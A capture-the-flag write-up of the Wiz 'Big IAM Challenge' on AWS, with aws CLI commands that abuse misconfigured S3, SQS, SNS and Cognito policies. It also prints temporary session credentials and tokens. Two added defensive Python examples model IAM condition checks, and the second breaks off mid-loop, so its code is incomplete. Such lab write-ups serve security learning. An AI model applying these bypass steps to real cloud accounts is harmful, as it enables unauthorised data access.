# Hackwekend Session 5 - Cloud Security (AWS IAM Policy)
![image](https://hackmd.io/_uploads/BJBuR4oZA.png)
> Yo, hello hello @everyone. It's been a good week to bring back Hackwekend. Continuing on, today we will learn and solve the Wiz.io CTF challenges about Cloud Security; today's target is IAM. Let's digest, bruh :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
![image](https://hackmd.io/_uploads/S1R-jQHMC.png)
Challenge Link: [BigIAMChallenge](https://bigiamchallenge.com)
## Challenge 1: Buckets of Fun
> Description: We all know that public buckets are risky. But can you find the flag?
![image](https://hackmd.io/_uploads/rk11FcsW0.png)
First, let's talk about the challenge. Based on the description and the IAM policy, we know the flag sits in a bucket, so we need to understand what a bucket is and how it works before digging in.
![image](https://hackmd.io/_uploads/Hkr0sqibA.png)
### Analysis
Learn more about S3 with [What is S3 ?](https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html)
> **(TL;DR)** *Amazon Simple Storage Service (Amazon S3) is an object storage service that offers industry-leading scalability, data availability, security, and performance. **Use Amazon S3 to store and protect any amount of data** for a range of use cases, such as data lakes, websites, mobile applications, backup and restore, archive, enterprise applications, IoT devices, and big data analytics. Amazon **S3 provides management features** so that you can **optimize, organize, and configure access to your data** to meet your specific business, organizational, and compliance requirements.*
In brief, `S3` is a simple place to put your files, data and anything else, and it lives entirely on `AWS`. For this challenge, you just need to figure out how to get the data out of the bucket.
### Solve and retrieve the flag
You will need the [aws s3 documentation](https://docs.aws.amazon.com/cli/latest/reference/s3/) for help.
Based on the IAM policy, you are allowed to `get` and `list` on the bucket, so this is what you need to do.
First, list the S3 objects to find the flag file you want; note that the policy also shows an additional path, `files`. Run the `s3 ls` command and you will see the flag file.
```bash!
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
```
![image](https://hackmd.io/_uploads/S1zFMjoWA.png)
`flag1.txt` is exposed. The next step is to read the contents of `flag1.txt`; use the `cp` command to take someone else's work :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
```bash!
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
```
![image](https://hackmd.io/_uploads/BJoOQii-R.png)
Flag: {wiz:exposed-xxxxxxxxx-as-usual}
### Conclusion
![image](https://hackmd.io/_uploads/B18dNoob0.png)
> The first challenge looks basic: you learn how to list and get the contents of objects in a bucket. If you expose S3 to the Internet without protecting anything, your secrets can leak. So you need to apply a policy to S3 to control what access can be performed.
Learn more about that with [Security best practices for Amazon S3](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)
## Challenge 2: Google Analytics
**Description**: *We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong? Join our queue and get the secret flag.*
![image](https://hackmd.io/_uploads/H1gSBoo-C.png)
### Analysis
![image](https://hackmd.io/_uploads/r1Hk8siZ0.png)
Next stage: for this challenge you need to know about `sqs`, the **message queue service** of AWS.
>**(TL;DR)** *Amazon Simple Queue Service (Amazon SQS) offers a secure, durable, and available hosted queue that lets you integrate and decouple distributed software systems and components. Amazon SQS offers common constructs such as dead-letter queues and cost allocation tags. It provides a generic web services API that you can access using any programming language that the AWS SDK supports.*
Simply put, you need to figure out how `sqs` works, receive a message from the queue and read its contents; the flag will be exposed.
### Solve and retrieve the flag
I just read a couple of walkthroughs; you can find the hard way to play this challenge in [this write-up](https://pswalia2u.medium.com/bigiamchallenge-aws-iam-challenges-ded45cb983f2#:~:text=with%20AWS%20credentials.-,Challenge%202,-The%20second%20challenge)
As for me, I solved this challenge in a fairly simple way, but you need to know that the IAM policy gives us `send-message` & `receive-message`. Googling this, you will find the [documentation](https://docs.aws.amazon.com/cli/latest/reference/sqs/)
First, I tried to retrieve the messages from the queue, since something interesting may be inside, and as expected you will find the hidden URL with the `receive-message` command *(FACT: this command is found inside the documentation of the `receive-message` command, a guess that turned out true :smile:)*
```bash!
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --attribute-names All --message-attribute-names All --max-number-of-messages 10
```
![image](https://hackmd.io/_uploads/SJyL_iobA.png)
Access the URL in the message `Body` to reach the bucket object that holds the flag contents
```bash!
curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
```
![image](https://hackmd.io/_uploads/SyauOjoZ0.png)
Flag: {wiz:you-are-xxxxxxx-of-the-queue}
### Conclusion
> Through this challenge, you learn about the `sqs` service of AWS. `receive` is probably enough for this challenge, but you can also try creating a queue message with `send`. The other lesson: you need to secure your services on AWS with IAM; it is the best practice for securing any service.
Learn more with [Security in Amazon SQS](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-security.html)
## Challenge 3: Enable Push Notifications
**Description**: *We got a message for you. Can you get it?*
![image](https://hackmd.io/_uploads/ry85KoiWC.png)
### Analysis
![image](https://hackmd.io/_uploads/BJXyqjsbC.png)
In this challenge, we will learn about a new service, `SNS`, the **Simple Notification Service** of AWS.
> **(TL;DR)** *Amazon Simple Notification Service (Amazon SNS) is a managed service that provides message delivery from publishers to subscribers (also known as producers and consumers). Publishers communicate asynchronously with subscribers by sending messages to a topic, which is a logical access point and communication channel. Clients can subscribe to the SNS topic and receive published messages using a supported endpoint type, such as Amazon Data Firehose, Amazon SQS, AWS Lambda, HTTP, email, mobile push notifications, and mobile text messages (SMS).*
You need to register your own server with the topic so that it sends messages to you, and the contents we want are probably in the message that comes back.
### Solve and retrieve the flag
To do this as expected, you need to be able to handle incoming requests, which means setting up a mock server that can receive `GET` and `POST` requests. Some applications you can use in this situation:
1. [Beeceptor](https://beeceptor.com/) : API Mocking
2. [Webhook.site](https://webhook.site/) : *Generates free, unique URLs and e-mail addresses and lets you see everything that’s sent there instantly. (Usage: Steal cookies, bypass authorized, ...)*
In this situation, I don't know why I can use `webhook.site` to receive the message submitted from the subscription, so `Beeceptor` came in by coincidence instead of `webhook.site`
![image](https://hackmd.io/_uploads/BJsSCk3ZC.png)
To subscribe an endpoint to the topic, you can find the method in the [documentation](https://docs.aws.amazon.com/sns/latest/dg/sns-create-subscribe-endpoint-to-topic.html); it uses `sns subscribe`, and the notification endpoint can be `beeceptor` or `webhook.site`
Subscribe with `webhook.site` (takes very long to receive the confirmation message)
![image](https://hackmd.io/_uploads/rys5kg3-0.png)
Subscribe with `beeceptor` (sorry, no image because beeceptor was broken while I was writing this)
```bash!
aws sns subscribe \
--topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \
--protocol https \
--notification-endpoint https://hissss.free.beeceptor.com/@tbic.wiz.io
```
Wait a few seconds and you will receive this subscription confirmation request
```json
{
"Type": "SubscriptionConfirmation",
"MessageId": "f627ce34-b444-467b-85da-16e7552ce235",
"Token": "2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf",
"TopicArn": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Message": "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
"SubscribeURL": "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf",
"Timestamp": "2024-04-25T07:50:45.994Z",
"SignatureVersion": "1",
"Signature": "rE1iclhXRmTYOX1n1G+vifwWfIoFt1u0R8N0sRjN4GdYnTh/Jq904DN6tKCYw5AcMIezss6Qe2iW7U9zvjzJAcX9QPBOvmQl6sPYon8/ygs8MhIoGskl3Vf3DsbdIgnZmoRVHJgFZRPrFV+kzMZa3i3YpG1iEjyAf1cM0igtLd5nXF43Je9XPOLiqyGH9QDDS8cM0HCWVBuGPETBexfcItioclDBQ8VKMTWawAtmdqhPTu9qrwcvDTsdGhPJ5qbKcpGt4bG4SxlpXVD/bZ3y9xGm0RltrksQ0kT8iuuVMdxDHewM7I7ZZstYEn2T7mSb95q2G1zPWXkyyao+KXYW+Q==",
"SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem"
}
```
Use the subscribe URL to confirm the subscription
```bash!
curl "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf"
```
Wait a few seconds and the message with the flag arrives on your `webhook` or `beeceptor` site
Flag: {wiz:always-xxxxxxx-asterisks}
### Conclusion
> Through this challenge, you learn how `sns` works, and how you can subscribe to the topic and get the message back with a `mock-site` or `webhook-site`.
Learn more about how to protect it with [Amazon SNS security best practices](https://docs.aws.amazon.com/sns/latest/dg/sns-security-best-practices.html)
## Challenge 4: Admin only?
> We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
![image](https://hackmd.io/_uploads/HJbk4e3bA.png)
### Analysis
![image](https://hackmd.io/_uploads/S1Yfrl3ZR.png)
This challenge asks you to list and get the contents in `S3` again, but with more security. You can learn about `s3` in the first challenge.
Checking the condition, there is an additional ARN under `ForAllValues`, and you need to bypass it to list the bucket.
### Solve and retrieve the flag
After focusing on the additional ARN, I figured out we need to bypass the S3 authentication, and the solution can be found in [Diving Deeply into IAM Policy Evaluation – Highlights from AWS re:Inforce IAM433](https://ermetic.com/blog/aws/diving-deeply-into-iam-policy-evaluation-highlights-from-aws-reinforce-session-iam433/)
> The problem is the usage of the ForAllValues operator! When **the key** is **absent** from the authorization context (as with a role that is not tagged with the key “Team”), **the condition evaluates to true**. Formally speaking this is because the empty set is a subset of all sets. “For all values in A x is true” is true if the group A is the empty set.
This means that when we do not sign the request (the `--no-sign-request` flag submits no credentials), the key is absent and the condition passes, and luckily the `s3` bucket lets this bypass through :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
```bash!
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
```
![image](https://hackmd.io/_uploads/HJcYrgnW0.png)
With the file name in hand, run the `cp` command to get the contents
```bash!
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt --no-sign-request -
```
![image](https://hackmd.io/_uploads/Hyn6Bx2-0.png)
Flag: {wiz:principal-arn-xxx-xxx-xxx-you-think}
### Conclusion
> The lesson of this challenge: nothing is perfectly secure; misconfigurations and mistakes will happen, so be very careful when you use `ForAllValues`.
To secure this, read [Authorization context: Principal evaluation](https://ermetic.com/blog/aws/diving-deeply-into-iam-policy-evaluation-highlights-from-aws-reinforce-session-iam433/#:~:text=virtual%20boundary%20principal.-,Authorization%20context%3A%20Principal%20evaluation,-The%20actual%20principal) to understand when IAM conditions apply and when they do not, figure out the differences, and find the condition that best matches what your service requires.
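The empty-set behaviour quoted above can be reproduced with a small model of condition evaluation. This is an added example, not code from the original write-up or from AWS: the statements, ARNs and the `condition_met` / `unguarded_forallvalues` helpers are constructed for illustration, and an unsigned request is modelled as a context with no `aws:PrincipalArn` key.

```python
import re

PRINCIPAL_KEY = "aws:PrincipalArn"
ADMIN_ARN = "arn:aws:iam::111122223333:user/admin"   # constructed placeholder

# Constructed statements (not the challenge's policy): the same Allow guarded two ways.
WEAK = {"Sid": "AdminOnlyWeak", "Effect": "Allow", "Principal": "*",
        "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example-bucket",
        "Condition": {"ForAllValues:StringLike": {PRINCIPAL_KEY: ADMIN_ARN}}}
HARDENED = dict(WEAK, Sid="AdminOnlyHardened",
                Condition={"StringLike": {PRINCIPAL_KEY: ADMIN_ARN}})

def _like(value, pattern):
    """IAM-style wildcard match: '*' is any run of characters, '?' is one character."""
    rx = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(rx, value, re.DOTALL) is not None

def condition_met(condition, ctx):
    """Simplified model of condition evaluation (StringLike and Null only).
    ctx maps key -> list of values; a key missing from ctx is absent from the request."""
    for op, tests in condition.items():
        qualifier, _, base = op.rpartition(":")
        if base not in ("StringLike", "Null"):
            raise ValueError("operator not modelled: " + op)
        for key, wanted in tests.items():
            wanted = wanted if isinstance(wanted, list) else [wanted]
            values = ctx.get(key)
            if base == "Null":                 # "false" means the key must be present
                if (values is None) != (str(wanted[0]).lower() == "true"):
                    return False
                continue
            hit = lambda v: any(_like(v, p) for p in wanted)
            if qualifier == "ForAllValues":    # absent key -> empty set -> vacuously True
                ok = all(hit(v) for v in values or [])
            elif qualifier == "ForAnyValue":
                ok = any(hit(v) for v in values or [])
            else:                              # plain operator: an absent key never matches
                ok = values is not None and any(hit(v) for v in values)
            if not ok:
                return False
    return True

def unguarded_forallvalues(statements):
    """Flag Allow statements that use ForAllValues without a Null:false guard on the key."""
    findings = []
    for st in statements:
        cond = st.get("Condition", {})
        guarded = {k for k, v in cond.get("Null", {}).items() if str(v).lower() == "false"}
        for op, tests in cond.items():
            if st.get("Effect") == "Allow" and op.startswith("ForAllValues:"):
                findings += [(st["Sid"], k) for k in tests if k not in guarded]
    return findings

ANONYMOUS = {}                                 # unsigned request: no principal key at all
ADMIN = {PRINCIPAL_KEY: [ADMIN_ARN]}
OTHER = {PRINCIPAL_KEY: ["arn:aws:iam::111122223333:user/dev"]}

if __name__ == "__main__":
    for name, ctx in (("anonymous", ANONYMOUS), ("admin", ADMIN), ("other", OTHER)):
        print(name, condition_met(WEAK["Condition"], ctx),
              condition_met(HARDENED["Condition"], ctx))
    print(unguarded_forallvalues([WEAK, HARDENED]))
```

Adding `"Null": {"aws:PrincipalArn": "false"}` next to the `ForAllValues` test closes the same gap when the set operator has to stay.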
## Challenge 5: Do I know you?
**Description**: We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.
![image](https://hackmd.io/_uploads/SkfGDlhb0.png)
### Analysis
![image](https://hackmd.io/_uploads/BknRwx2WC.png)
In this challenge, you will work with a new identity service of AWS, `cognito`
> **(TL;DR)** *Amazon Cognito is an Amazon Web Services product that controls user authentication and access for mobile applications on internet-connected devices. The service saves and synchronizes end-user data, which enables an application developer to focus on writing code instead of building and managing the back-end infrastructure. This can accelerate the mobile application development process.*
This means you need to use `cognito` to authenticate your shell, or to get an identity that can access the private bucket
### Solve and retrieve the flag
First, you need to **check the raw source of the page script**. IDK about it, but it's a CTF challenge, which is why you need to do this; some identity details are hidden in the background. Use F12 or `view-source:` to see it. The `identity-pool-id` will be exposed
![image](https://hackmd.io/_uploads/BkO1Fx2bA.png)
```json
IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
```
After viewing the policy, you know you have full access to AWS Cognito, which means you need to use Cognito to escalate permissions. To get an identity from Cognito, you can use `get-id` to read the `IdentityID`
```bash
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
```
![image](https://hackmd.io/_uploads/SJTOYx3ZR.png)
```json
{
"IdentityId": "us-east-1:157d6171-xxxxx-xxxx-xxxx-70ee00d8a205"
}
```
Getting the IdentityID is really good news. The next step is to get the full set of credentials for authentication: you can use the `IdentityID` to get `credentials` for the Cognito user with the `get-credentials-for-identity` command
```bash
aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-eeb7-c4b4-26e9-70ee00d8a205
```
![image](https://hackmd.io/_uploads/Bk16FxnbC.png)
```json
{
"IdentityId": "us-east-1:157d6171-eeb7-c4b4-26e9-70ee00d8a205",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXOIRTUPHO",
"SecretKey": "seu7OTd212HGes3bbYo0ZfE9MXukchMDTtPlZPE7",
"SessionToken": "IQoJb3JpZ2luX2VjEKn//////////wEaCXVzLWVhc3QtMSJGMEQCIDjCawLxtiPwlu6pnUH7VEb77v59A5jt+G9oVZpWX1/KAiAcKr+LNP0E4hgqDnm5hPDwuvAx+MsLG4oTyG2/4R+JlyrRBQjy//////////8BEAA
aDDA5MjI5Nzg1MTM3NCIMh2JDoW8l0odiidmPKqUFsbOWeCSlBCrJu10OZkyVs+fk4U6F6OHrub0z+zRtw2JStCgXxC4C3o9Dhp01Pz8TNQ9/4zyE8NOZBsSE1aPGlHlwNJuykK1p0QMVXsxTVMfoNzU9NNFlAZGqGY6jFrxSrci0M2FxaQCr6z5bTh4
tEPBCS/8PAr6sKel3Lv5GbILTNxXgsDi4yxT94VNaqKDlNPAdQ2+ujgS87u2vZh6Tw2yk0fFQlPVri57RRl6YUvjwsN9tTHx7mq5qUy/tqkrW60BERDTbw7aheTXaFb5hqLi+xatmqgHoMM5PY6hdaEpOzB2EpzWqZ4bd489fExOqKoH0I+gXYd8kRCG
8vdLr5G7C3MHNocC+IXtzggyP/rq9h288aN+zu3+8kmmGqQDAHp/J33TcX3EQCaqHJsjzwIlhebf5XAWAdmtRo8OFAsZi/9x41YAJPmYfrVQgrCKiFHh55cTYsg9icR1D5QIn0b7vNOx3I17K3ETpwIZQ968cAhLEsuhBlo3T442IBy5nYEYMpG3MGV9
Rd9qrvcpQMqKaasE3ewY47XFvRf3fHHBTojXSYZnQRElPk2iYICowUcc4SzF1/e4FT/KinmZQHR/h455G2f7/J5k7UMhQfk/AvVcrCjeWu1Qh+czY6AdJqVKcPCqSNWznWZL3OPXNTCP7YeSYfnBCLJLumlQFXpo7lgKD2469eW0bI6OreF1+bwmGaEI
s+aiG45Nb42FV8c/bF3Gsf0H7p6MHwptH3UOuu1piyB0ApyEWt6dWgxd6PFm7X50wbrTp5vpHPMwZHzuFVYjBG3ycWIam4+nXGhzzBVh0mlbTAev0xap9hPHgg6uy64BhZr9crXexPvcH6gIZ7aUNLov1PwfWLpqvB25wNNLZaJ1zFu5S0tMHPn3gYmh
kLPEwpfO5sQY63wLC7Q8QvTOKH+gQCY9KkWzz7EgKyRIPPn06P2sYGgFqYZHl5UHxXXDWi1QVEUaIN6bcfDg0qohntu6LoygH1q0SyB7ZSkp6Rkuv5VEyWs7ju6pFxdiE2JalUA7JQWEnHw1I6XUutegYPxIS/Cq/JKA4Zs14xU3pIHTHsK091pT49Eq
eA+g0xVOPTWatAIQsukrHJ8DpP7+3jIaUEdkEvmzi+Q8l0xf6ERRXPn72cAVO4xcbibnF4i6hTNoBLD2FzKeEDD3NtONBlJAfkIsxspL/RuBiuJjCBujm9dGoZD68oCyM7AT0LMELvwEYhY4JugdDAS1gXeXMn1ESlq6PR86Dt+r2q/Nvz4R9vx6Es8U
pdT7DrD0eRSmTp3Z8Z/xg1sn8E/H3mqQVLa+sez4XwVzf/XhUFieS+N2ulACFqA8gME369Amq4hl/DJgC+31srQA2Qcd6BzcZLQqDloZiURY=",
"Expiration": 1714325429.0
}
}
```
You can save these credentials in the shell or overwrite the environment to apply this role to the current shell, but it's not like the dream: you must run `configure` to set this up :laughing: :laughing: :laughing:
```bash
aws configure --profile challenge5
```
It's tough to say, but you will need aws in your own shell to perform this command, because you are not allowed to run this command in that shell, IDK (a couple of days ago I could, but currently I can't; I wasted much time figuring out the reason)
The easy way: save the tokens and export them to the environment for authentication; it is easy to read about in the [documentation](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html)
![image](https://hackmd.io/_uploads/Bko_9lnZ0.png)
After exporting the env variables to authenticate the AWS CLI, you can check your AWS role with the `sts` command
```bash!
aws sts get-caller-identity
```
![image](https://hackmd.io/_uploads/S1eY3ycZ0.png)
The rest of the work is pretty easy: you can list the bucket contents and read the flag
```bash
# List the objects in the bucket
aws s3 ls s3://wiz-privatefiles
```
![image](https://hackmd.io/_uploads/r1nxjghWC.png)
```bash
# Get the contents from flag.txt
aws s3 cp s3://wiz-privatefiles/flag1.txt -
```
![image](https://hackmd.io/_uploads/BJxXix3-C.png)
Flag: {wiz:incognito-xxxx-xxx-suspicious}
### Conclusion
> Awesome challenge: you learn how mobile or external clients can authenticate with `cognito` of AWS, and how we can use `cognito` to create the variables to connect to `AWS`
Learn more about how to secure `cognito` with [Security in Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/security.html)
## Challenge 6: One final push
**Description**: *Anonymous access no more. Let's see what can you do now. Now try it with the authenticated role: `arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role`*
![image](https://hackmd.io/_uploads/SyKm2xnZR.png)
### Analysis
This challenge is a level up from Challenge 5: you need to figure out how to assume a role with web identity, another way to authenticate to AWS with a specific role
![image](https://hackmd.io/_uploads/SJMGAl3W0.png)
### Solve and retrieve the flag
First, going by the **wording of the challenge** about assuming the role, you need to figure out that this challenge is much the same as challenge 5. Easily, you have the `identity-pool-id` in the IAM policy; you just need to `get-id` from `cognito`
```bash
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
```
![image](https://hackmd.io/_uploads/B1A2Ren-C.png)
```json
{
"IdentityId": "us-east-1:157d6171-eef0-cec9-1180-962565110331"
}
```
Next step: get an `open-id` token to assume the role with `web-identity` instead of getting the credentials, because you will not have permission (I think so :smile:) like in challenge 5
![image](https://hackmd.io/_uploads/Sy45ebnWR.png)
Experiment: walk through the steps as in challenge 5, and you will get the `identity` like this
![image](https://hackmd.io/_uploads/S1p3J-h-A.png)
![image](https://hackmd.io/_uploads/rywNe-3W0.png)
You will be sad and disappointed in this situation: authentication with `get-credentials-for-identity` fails, because it requires `web-identity`
![image](https://hackmd.io/_uploads/HJjAlZnZC.png)
First, you need to know the requirements of the assume-role command, [assume-role-with-web-identity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html)
It requires `--role-arn <value> --role-session-name <value> --web-identity-token <value>`
- role-arn: `arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role`
- role-session-name: `<base-on-decision>`
- web-identity-token: you need to learn how to use this from the [documentation](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
![image](https://hackmd.io/_uploads/HJGx9-5WA.png)
So this means you can use an `OAuth 2.0 token` or an `OpenID Connect ID token` to provide the web identity, and you can use cognito-identity to provide your `openid token`. You will use [`get-open-id-token`](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-open-id-token.html) to generate an OpenID token for your shell
```bash
aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eef0-cec9-1180-962565110331
```
![image](https://hackmd.io/_uploads/ByNc--3Z0.png)
```json
{
"IdentityId": "us-east-1:157d6171-eef0-cec9-1180-962565110331",
"Token": "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVmMC1jZWM5LTExODAtOTYyNTY1MTEwMzMxIiwiYXVkIjoidXMtZW
FzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3M
TQzMjQ0NDEsImlhdCI6MTcxNDMyMzg0MX0.N2fsrW6atXMq42TW4BqnDLGLwVm4I33RqPR5gIm5WUBS8buJh7m-4cbsDPCAr6xcHC6TmB0eMYe3MRUyZaPkjjd2meWCCB438meSVaU35s87m0-Cs8VZmVvJcKE-Rn-Ol5rm
8nL0hVt2NUG9y4gGYW4gvUh7SBfj-wvRAF_giAwmV6sqLabP2uX32aSxZbFdFdL-XAdnEM-KA5mdRdxyqyqCJG18ZPfqZ_9bVpuCKsr3t42UEcqvVS0DUZwYVJCx4qX1i88aTFvDbVsBS9OU6T_BX3fOhlWBjLF1VTlTs0n
bGkfFnNVzwB8_dzAYZ0vWTADg-R_8PY9BAtWZkG26zQ"
}
```
Done. Next, we will have the current shell assume the role with the `web-identity` token
```bash
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name chal6 --web-identity-token "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVmMC1jZWM5LTExODAtOTYyNTY1MTEwMzMxIiwiYXVkIjoidXMtZW
FzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3M
TQzMjQ0NDEsImlhdCI6MTcxNDMyMzg0MX0.N2fsrW6atXMq42TW4BqnDLGLwVm4I33RqPR5gIm5WUBS8buJh7m-4cbsDPCAr6xcHC6TmB0eMYe3MRUyZaPkjjd2meWCCB438meSVaU35s87m0-Cs8VZmVvJcKE-Rn-Ol5rm
8nL0hVt2NUG9y4gGYW4gvUh7SBfj-wvRAF_giAwmV6sqLabP2uX32aSxZbFdFdL-XAdnEM-KA5mdRdxyqyqCJG18ZPfqZ_9bVpuCKsr3t42UEcqvVS0DUZwYVJCx4qX1i88aTFvDbVsBS9OU6T_BX3fOhlWBjLF1VTlTs0n
bGkfFnNVzwB8_dzAYZ0vWTADg-R_8PY9BAtWZkG26zQ"
```
> **(Warning)** *I made it work in the end, but the format is terrible, so you need to be careful about that. One more thing to keep in mind: the `IdentityID` and `Token` are time-limited*
![image](https://hackmd.io/_uploads/HkmAzZ3W0.png)
Like chal5, export the env variables to authenticate your aws-cli. After that, the role assumption is complete
![image](https://hackmd.io/_uploads/BynrmZ3-R.png)
After exporting the env variables, use `sts` to check your authentication
![image](https://hackmd.io/_uploads/B1K_Q-nbR.png)
With all the steps above complete, you need to find which s3 bucket to open and what it contains, as easy as challenge 1
```bash
# List the buckets visible to the assumed role
aws s3 ls s3://
```
![image](https://hackmd.io/_uploads/BkLpmbn-C.png)
Access the bucket and read the flag contents of the last challenge
```bash
aws s3 ls s3://wiz-privatefiles-x1000/
aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
```
![image](https://hackmd.io/_uploads/Bk1bVb2WA.png)
Flag: {wiz:open-sesame-xxx-xxx-xxx-say-openid}
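The token returned by `get-open-id-token` above carries an `amr` claim, and a role's trust policy decides whether an unauthenticated identity may use it. The sketch below is an added example, not code from the original write-up or the challenge: it audits a Cognito trust statement and models which tokens it accepts. The pool id, `sub` value and both statements are constructed placeholders, and the idea that the weak statement pins only `aud` is an assumption, since the real policy appears only as a screenshot.

```python
import base64
import json

AUD_KEY = "cognito-identity.amazonaws.com:aud"
AMR_KEY = "cognito-identity.amazonaws.com:amr"
POOL_ID = "us-east-1:00000000-0000-0000-0000-000000000000"   # constructed placeholder

def trust_statement(require_authenticated):
    """Constructed trust-policy statement for a Cognito-federated role."""
    cond = {"StringEquals": {AUD_KEY: POOL_ID}}
    if require_authenticated:
        cond["ForAnyValue:StringLike"] = {AMR_KEY: "authenticated"}
    return {"Effect": "Allow",
            "Principal": {"Federated": "cognito-identity.amazonaws.com"},
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": cond}

def sample_token(amr, aud=POOL_ID):
    """Build an unsigned, constructed token shaped like get-open-id-token output."""
    enc = lambda obj: base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    claims = {"sub": "us-east-1:11111111-1111-1111-1111-111111111111", "aud": aud,
              "amr": amr, "iss": "https://cognito-identity.amazonaws.com"}
    return ".".join([enc({"typ": "JWS", "alg": "RS512"}), enc(claims), "constructed-signature"])

def jwt_claims(token):
    """Decode the payload segment without verifying the signature (inspection only)."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))

def trust_allows(stmt, claims):
    """Model how the token's aud and amr claims are matched against the trust conditions."""
    cond = stmt.get("Condition", {})
    aud = cond.get("StringEquals", {}).get(AUD_KEY)
    if aud is not None and claims.get("aud") != aud:
        return False
    amr = cond.get("ForAnyValue:StringLike", {}).get(AMR_KEY)
    # Exact comparison is enough for the literal values used here (no wildcards).
    if amr is not None and amr not in claims.get("amr", []):
        return False
    return True

def audit(stmt):
    """Return findings for a Cognito-federated Allow statement; [] if nothing is flagged."""
    principal = stmt.get("Principal")
    if not isinstance(principal, dict) or \
            principal.get("Federated") != "cognito-identity.amazonaws.com":
        return []
    cond = stmt.get("Condition", {})
    findings = []
    if AUD_KEY not in cond.get("StringEquals", {}):
        findings.append("aud-not-pinned")       # any identity pool could mint a usable token
    if cond.get("ForAnyValue:StringLike", {}).get(AMR_KEY) != "authenticated":
        findings.append("amr-not-required")     # guest identities can assume the role
    return findings

if __name__ == "__main__":
    guest = jwt_claims(sample_token(["unauthenticated"]))
    for strict in (False, True):
        stmt = trust_statement(strict)
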